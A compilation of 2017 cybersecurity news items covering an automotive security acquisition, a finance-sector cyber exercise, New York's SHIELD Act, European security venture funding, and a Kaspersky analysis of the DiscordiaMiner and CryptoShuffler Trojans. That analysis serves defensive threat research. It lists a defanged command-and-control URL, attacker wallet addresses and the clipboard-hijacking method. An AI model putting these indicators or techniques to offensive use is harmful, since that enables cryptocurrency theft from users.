Periodically update installed software and remove unwanted applications
Don’t connect expensive equipment to the main LAN
Ensure timely detection of malicious activity on the LAN

Automotive Cybersecurity Firm Argus Acquired by Continental
10.11.2017 securityweek  Cyber
Argus Cyber Security, a Tel Aviv, Israel-based startup focused on automotive cyber security, has been acquired by Continental subsidiary Elektrobit (EB), which provides embedded software solutions to the automotive industry.

Terms of the acquisition were not disclosed, but some reports have the deal estimated to be in the range of $450 million.

Argus Cyber Security Logo

Founded in 2013, Argus offers a modular suite designed to protect cars from hacks. Offerings include an Intrusion Prevention System (IPS) that leverages Deep Packet Inspection (DPI) algorithms to help prevent a vehicle's critical components from being hacked, which the company says can be integrated into any vehicle production line.

The Argus IPS also generates reports and alerts for remote monitoring of a vehicle's cyber health, the company said.

The company has more 70 employees and 38 granted and pending patents.

As part of EB, the company will continue to engage in commercial relations with all automotive suppliers globally. “This combination of Continental’s broad automotive know-how, Argus’ technology, market-ready solutions and expertise in automotive cyber security, and EB’s deep automotive software knowledge, marks a unique cooperation in the automotive industry,” the company said.

Cyber threats to automotive systems are not necessarily new, but are becoming more of an issue as cars become connected to the Internet and to other devices such as smartphones, smart keys, diagnostic tools and other vehicles.

A number of security researchers have demonstrated the ability hack into modern vehicles to manipulate steering, acceleration, speedometers and safety sensors, sparking concerns that malicious attackers could use similar techniques to compromise a vehicle's Electronic Control Units (ECUs) allowing manipulation of a car's engine, brakes, airbags and other safety systems or vehicle components.

Quantum Dawn War Games Test Cyber Resiliency in Finance Sector
10.11.2017 securityweek  Cyber
Quantum Dawn IV, a large-scale exercise to test the cyber resiliency of the U.S. finance sector, was held on Tuesday and Wednesday this week. The excercise had more than 900 participants from over 50 financial institutions, government agencies and regulators.

Run by SIFMA (the Securities Industry and Financial Markets Association), Quantum Dawn is designed to test this industry's ability to weather a major cyber attack. SIFMA describes itself as the voice of the U.S. securities industry, representing broker-dealers, banks and asset managers.

"There is likely no greater threat to financial stability than a large-scale cyber event, which SIFMA considers a low-probability, high-impact event that the industry must prepare for along with other possible crisis events," explains Kenneth Bentsen, SIFMA president and CEO.

The exercise, he said, enabled financial institutions, key government agencies and other industry partners to practice communication and response processes to maintain smooth financial market operations in the event of a sector-wide attack. The outcome of the exercise, however, will not be known until the Deloitte Risk and Financial Advisory Cyber Risk Services analyzes the data and produces a 'public after-action' report with observations and recommendations over the next few weeks.

In the meantime, we just have Bentsen's comment, "A clear takeaway from the exercise is the importance of a robust partnership between the industry and government grounded in information sharing. No single actor -- not the federal government, nor any individual firm -- has the resources to protect markets from cyber threats on their own."

The value of such exercises is rarely questioned.

"Any exercise of this nature is always a good idea. Financial Services are part of critical infrastructure and we know they they are under sustained and increasing attacks," Neira Jones told SecurityWeek. "Destabilization of financial markets is definitely not something we want to see happen (well, not caused by cybercrime where we could potentially help it/minimize it anyway)," she said.

Jones is a non-executive director at Cognosec, chairs the advisory board for Ensygnia, and spent four years on the PCI SSC Board of Advisers. She has also worked for Barclaycard, Santander, Abbey National, Oracle Corp. and Unisys.

"While financial services are heavily regulated (in security, too), regulations are always some steps behind technology and criminals," she added. "Quantum Dawn is essentially good practice because it is merely testing an incident response plan through simulation, which should be standard practice anyway. It doesn't detract from individual bank testing of their own incident response processes -- which does happen in the great majority, and certainly for the major banks and FS firms."

Quantum Dawn is similar to Waking Shark in the UK. "The trick of course," Jones told SecurityWeek, "will be to act on the lessons learned and for the results not to be confined to the archives. Only time will tell."

That is certainly the hope of Bentsen. "Cybersecurity is truly an issue where the interests of the industry and public sector are fully aligned. SIFMA and our members are constantly working to improve cyber defenses, resiliency and recovery through massive monetary investment in technology and personnel, regular training, industry exercises, and close coordination between the financial sector and the government, including our regulators. Best practices are developed and refined regarding penetration testing, insider threats, third-party risks, and secure data storage and recovery. Lessons learned from Quantum Dawn IV will help shape these initiatives as we constantly work to get better."

Quantum Dawn IV leveraged NUARI (Norwich University Applied Research Institutes), and its latest version of the DECIDE FS, and the SimSpace Corporation’s Cyber Range software for the simulation and execution of the exercise.

In 2013, U.S. banks suffered a series of disruptive DDoS attacks from a group that called itself itself the Izz ad-Din al-Qassam Cyber Fighters. Growing concern about both nation-state and organized criminal attacks of increasing sophistication against the critical infrastructure make exercises like Quantum Dawn essential.

New York State Proposes Stricter Data Protection Laws Post Equifax
4.11.2017 securityweek Cyber

New York State Attorney General Eric T. Schneiderman introduced new legislation Thursday, designed to protect New Yorkers from corporate data breaches like the recent Equifax breach that affected more than 145 million Americans, including 8 million New York residents. Its purpose is to increase the security of private information in a business-friendly manner.

Called the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act), it was introduced by Schneiderman as a program bill, and is sponsored by Senator David Carlucci and Assemblymember Brian Kavanagh. "It's clear that New York's data security laws are weak and outdated. The SHIELD Act would help ensure these hacks never happen in the first place. It's time for Albany to act, so that no more New Yorkers are needlessly victimized by weak data security measures and criminal hackers who are constantly on the prowl," said Schneiderman.

It is worth noting that Schneiderman's SHIELD Act is not the same as Senator Markey's proposed Cyber Shield Act. A draft (PDF) of Markey's bill coincidentally became available last week. While Markey's proposal is to bake security into IoT devices, Schneiderman's proposal is to bring security to businesses by through reasonable security safeguards with new controls over breach disclosure backed by financial sanctions.

Under current New York law, companies can compile personally identifiable information (PII), but are not required to meet any data security requirements if that PII does not include a social security number -- for example, the current law does not require companies to report data breaches of username-and-password combinations, or biometric data like the fingerprint used to unlock an iPhone. The changes will be achieved through amendments to the existing General Business Law and the State Technology Law.

The SHIELD Act requires businesses to adopt "reasonable" administrative, technical, and physical safeguards for sensitive data. Its scope covers any business that holds New Yorkers' sensitive data rather than simply conducts business within New York. It expands the types of data that trigger reporting requirements, to include username-and-password combinations, biometric data, and HIPAA-covered health data.

Penalties for violation are increased. It allows the attorney general to seek civil penalties and injunctions if businesses do not provide adequate security for PII. This could be $5,000 for each violation, or up to $20 for each instance of failed notification (up to a total of $250,000).

The attempt by Schneiderman is to protect New Yorkers' personal data just as the European General Data Protection Regulation (GDPR) seeks to protect European's personal information. Schneiderman, however, tries to be more business-friendly. Firstly, the penalties are much lower. Secondly, the required breach disclosure timeline is more flexible. "The disclosure shall be made in the most expedient time possible and without unreasonable delay, consistent with the legitimate needs of law enforcement..."

Thirdly, there is an explicit encryption exemption. PII is only classified as PII "when either the personal information or the data element is not encrypted or encrypted with an encryption key that has also been ACCESSED OR acquired."

Fourthly, it provides a safe harbor against attorney general enforcement for companies already compliant with the NYS DFS, Gramm-Leach-Bliley, and HIPAA regulations; and those with independent certification of compliance with ISO and NIST standards. And fifthly, it provides a flexible approach for small businesses provided they "implement and maintain reasonable safeguards that are appropriate to the size and complexity of the small business."

David Zetoony, the leader of Bryan Cave's consumer protection practice, commented, "Providing a safe harbor for companies that go above-and-beyond to certify good data security is innovative, unique, and friendly to business. It rewards businesses that go the extra mile to audit and verify compliance with an industry data security practice, removing the costs and unpredictability of government litigation. It also does not penalize smaller businesses that have good security practices, but cannot afford the significant cost of annual data security audits and certifications. This is the type of thought leadership needed to improve data security legislation across the country."

Despite these exemptions and flexibility, the Shield Act will enforce stronger personal data protection than has so far been required outside of the regulated New York financial institutions. The definition of a data breach is broadened to include an unauthorized person gaining access to information, while the reach of the law has been widened from companies that do business in New York to companies that hold personal information of New Yorkers.

"While the federal government drags their feet we must act to protect New Yorkers. The SHIELD Act will serve as a blueprint for NY and the rest of the nation to follow to keep Americans safe," said co-sponsor Senator David Carlucci.

Tech Investor VT Partners Aims to Fuel Cybersecurity Firms in Europe
2.11.2017 securityweek  Cyber
Newly Formed VT Partners Seeks to Combine International Finance, American Adventure, and European Innovation

A recently formed venture capital investment firm aims to feed European technology companies and seed a new entrepreneurial approach to cybersecurity businesses in Europe. Formed earlier this year and now partnered by cybersecurity investment specialist Paladin Capital Group, VT Partners came out of the shadows last week.

VT Partners is a European B2B growth capital firm, founded by ex-Carlyle Group director, Nazo Moosa and former GMT Partners senior partner, Natalie Tydeman. The collaboration with Paladin is designed to provide high potential technology companies -- whether they are early stage companies or more established technology SMEs -- with a one-stop platform for their funding needs. Moosa becomes Paladin's new Senior Strategic Partner Europe.

Venture capital in cybersecurity is not without its critics. It has been claimed, for example, that it can promote products beyond their actual worth. While accepting that "venture capital gave birth to many great security companies that would otherwise unavoidably fail," High-Tech Bridge CEO Ilia Kolochenko believes that the relative stability of the cybersecurity market during a period of great economic instability has attracted investors with little or no knowledge of security.

"Genuine venture capital," he says, "is not just about cash, but about the tangible help and practical support it can provide to skyrocket the business. Very few VCs really do this -- many just create an active semblance of coaching and support that rather hinders the business. Cybersecurity startups should be very careful when they select a VC, and keep in mind that this step is quintessential for their success or failure."

VT Partners would probably agree with this assessment. It focuses on cybersecurity, artificial intelligence, and critical industries. Paladin is also cybersecurity-centric, with existing successful investments in PhishMe, Digital Shadows, Anomali, Endgame and Panaseer.

"We think that being a generalist in technology is a mug's game," Moosa told SecurityWeek. "It's difficult to invest in the more dynamic sections of technology when you are pursuing a generalist strategy. Cybersecurity is a very good example of that -- it's complex and frequently changing, there's a lot of vendor churn -- and the only way to get smart about the industry is to narrow your focus and spend a lot of time and resources getting to know that industry. Paladin has been doing just that for the last 16 years."

The reality, however, is that despite similar populations, the U.S. has five-times the venture funding of Europe -- and there are reasons for this. "Europe is not short of ideas," said Moosa. Think of the God Particle, graphene, public key encryption and the world wide web itself. "But the U.S. has more than just capital, it also has a well-established entrepreneurial infrastructure." This is what is lacking in Europe. "There's not just a dearth of capital, there's a dearth of certain skills in Europe."

Moosa sees the biggest problem for European companies in turning a differentiated product into a market success is a lack of entrepreneurial expertise in product management and marketing. Reflecting Kolochenko's view of what makes good venture capital, she sees her role as not just providing capital, but in helping clients find the right people to ensure success. "We've seen a real excitement around emerging technologies," she said, "particularly in artificial intelligence, machine learning and data analytics where Europe is leading. But many European businesses do not have access to the appropriate levels of capital and mentorship required to place their business onto a global stage."

To provide the mentorship, she is turning to the entrepreneurial market pool in the U.S., and especially in Silicon Valley. "I try to bring back certain ex-pats who have successfully moved to the US -- sometimes I'm successful, sometimes I'm not. Our collaboration with Paladin in this area is valuable because they have a very strong US cybersecurity market and we tap into that -- but ultimately its really about knowing the individuals who are strong in these areas -- some are coming out of the companies we invested in ten or 15 years ago -- and bringing those into the organizations we invest in. But I do believe that there is a real gap in Europe that needs to be filled if you want to take a product beyond the early stage. The only way to really be able to do that is to work very closely with management teams -- management still runs the business, but we try to complement them and fill in the gaps with both temporary and long term solutions."

The time is ripe for European venture capital. Moosa acknowledges some of the criticism of VC in the U.S. "We are possibly at the peak of the current market -- you could argue that markets peak every seven or 8 years; and we're in year 8 or 9 in the current sequence. Such criticism is often made at this stage, and sometimes legitimately: that there is more money going in, and that there's more venture capital than intellectual capital in some of the new companies. But I've seen two great peaks in 2000 and now in 2007, so criticism might simply reflect where we are in the market right now; but the point that I would bring us back to is that Europe is very, very different."

If Moosa succeeds, she will bring a combination of international finance and Silicon Valley energy to an underdeveloped but innovative European cybersecurity space. She acknowledges that some of these companies might achieve some success and up-sticks to move to America -- if only because many of the early adopters of new technology are American. In her heart, however, she wants to be a part of developing a new and vibrant European cybersecurity industry that will remain very much European.

Tales from the blockchain
2.11.2017 Kaspersky Cyber

Cryptocurrency has gradually evolved from an element of a new world, utopian economy to a business that has affected even those sectors of society least involved in information technology. At the same time, it has acquired a fair number of “undesirable” supporters who aim to enrich themselves at the expense of other users: attackers who release miners embedded in user JS scripts, or plan to implement miners into IoT devices at the production stage; hidden in countless variations of Trojans in conjunction with SMB exploits etc.

We will tell you two unusual success stories that happened on the “miner front”. The first story echoes the TinyNuke event and, in many respects gives an idea of the situation with miners. The second one proves that to get crypto-currency, you don’t need to “burn” the processor.

DiscordiaMiner and fights on forums
In early June, our analysts found a new and seemingly unremarkable Trojan that unloaded the miner of the popular Montero crypto-currency. However, in the course of further research, we uncovered many interesting details that we would like to share with you.

Kaspersky Lab products detect this Trojan as Trojan.Win32.DiscordiaMiner. It works as follows:

Creates a number of directories in the system to download the necessary files;

Copies itself in C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe;
Gets the update from the server;

Creates an autorun task;

Gets the miner files;

Gets the credentials of the user in whose name it wants to run the mining;
Starts the miner.

All interaction with the command server (C&C) occurs in the open, with the help of GET requests, without any check or verification. In all samples, the hxxp://api[.]boosting[.]online address is provided as the C&C. The line associated with the individual user (etc. MTn31JMWIT) and the address of the required resource – the list of files, the update, etc. – are added to the server address. Example: hxxp://api[.]boosting[.]online/MTn31JMWIT/getDiscordia

Discord on the forum
As mentioned above, at a certain point in its work, the Trojan is instructed to issue a command to run the miner: it specifies the email of the user who has “done the job”. It looks like this:

-user <user_email> -xmr

Using the value of the <user_email> argument, with the first line of the search results we get the Trojan-related topic on the Russian-language forum:

On this forum thread there is a wide discussion of the Trojan’s work details. The most interesting part of the discussion is on page 21 – the forum participants accuse the Trojan’s author of substituting users’ addresses with his own. Among other things, there is also a dialogue on the chat app, Telegram where the author explains this substitution as a banal mistake.

On the forum, the author of DiscordiaMiner references the short lifespan of this error as an argument in his defense:

He also mentions the figure of 200,000 infected machines. It is difficult to say how true this is. However, in the malware samples we received, the email that the “prosecutor” refers to is often named. Examples of other addresses: ilya-soro*****12@mail.ru, v*****re@gmail.com, topne*****arin@gmail.com, J ***** m @ yandex.ru, steamfa*****aunt1@mail.ru, me*****ook@gmail.com, x*****z@yandex.ru, piedmont ***** lines @ yahoo. com.

Among other things, in the course of the dispute the author mentions that the source codes of the Trojan DiscordiaMiner are now publicly available.

Indeed, the first line of the search results provides the link to the author’s repository.

In addition to the source codes, which really do coincide fully with the restored Trojan code, the repository also includes very informative diagrams of the Trojan’s operation, the samples of documents used for distribution as well as instructions for how exactly the UAC is to be bypassed. The pictures below are taken from the repository (which is currently unavailable).

The source codes are presented in full and, apparently, only the user-associated string (ClientID) varies from assembly to assembly.

Although the “dumping” of program source code is not unique, this case in many respects echoes the NukeBot story – the same disputes on a forum followed by the publication of the source codes by the author with the aim of “protecting honor and dignity”. Another common feature is the “minimalistic” design of both Trojans: NukeBot could only embed web-based injections into the browser, while DiscordiaMiner can download and run files from a remote server. But we cannot say whether these two bots have any more specific connections.


It’s extremely rare for authors of mining software to become fabulously wealthy. With a few exceptions, the wallets used by attackers contain a total of $50-100, received from all incoming transfers during the entire period of the Trojan’s work. However, there are those that do not go down the beaten path, and benefit from “alternative” ways. The authors of the CryptoShuffler Trojan belong in this category.

Kaspersky Lab products detect this Trojan as Trojan-Banker.Win32.CryptoShuffler.gen. MD5 of the file in question is 0ad946c351af8b53eac06c9b8526f8e4

The key feature of CryptoShuffler is the following: instead of wasting processor time on mining, the Trojan simply substitutes the sender’s address in the clipboard! That was once the case with WebMoney and Bitcoin, but this malware sample is aimed at all popular cryptocurrencies.

As usually happens in the beginning, the Trojan writes itself into the registry for autoloading.

In later versions of the Trojan, this procedure is slightly different – if the module is implemented as a dynamically loaded library, its further run at the start is performed using the rundll32 system utility. The name of the called procedure and, concurrently, the main function of the represented library is call_directx_9.

The Trojan creates a thread of execution, in which it maintains unchanged the autorun branch specified in the screenshot above.

The substitution itself is performed using the API binding functions OpenClipboard \ GetClipboardData \ SetClipboardData

The search for the corresponding wallet in the string received from the clipboard is performed using regular expressions. Most popular cryptocurrency wallets have a fixed constant at the beginning of the string and a certain length – it is easy to create regular expressions for them. For example, the address of Bitcoin-wallets can be easily recognized by the digit “1” or “3” at the beginning of the string.

The body of the Trojan stores the wallets, corresponding to the specified cryptocurrencies. The main list looks like this.

WALLET Currency name
1v9UCfygQf3toN1vA5xyr7LhKmv9QWcwZ BITCOIN
D7uMywpgSyvy9J2RkyQ2oozT4xTmSSWGgR DOGECOIN
Xv4M3y36iu6Fc5ikk8XuQBDFMtRz2xFXKm DASH
0xfb25b3d5ae0d6866da17c4de253ce439b71d0903 ETHEREUM
4ZFYNck6mZfG52RMdWThJEXq4Sjdszf719 MONERO
N6VeTbNiFG1oapzPZmeLLkkNC55FQGMTgr ???
t1VVkuasB7pNHPES2ei6LCqP1hZWb5rfPrB ZCASH
PM44dh7LNEjThgmscw8t5rb9LZqEPc2Upg ???

The biggest profit reaches the cybercriminals’ pockets from the users of Bitcoin wallets – at the time of writing, there were ~ 23 BTC on the balance of their wallet, which at the end of October amounted to approximately $140,000. The amounts in the remaining wallets range from tens to thousands of US dollars.

The malware described is a perfect example of a “rational” gain. The scheme of its operation is simple and effective: no access to pools, no network interaction, and no suspicious processor load.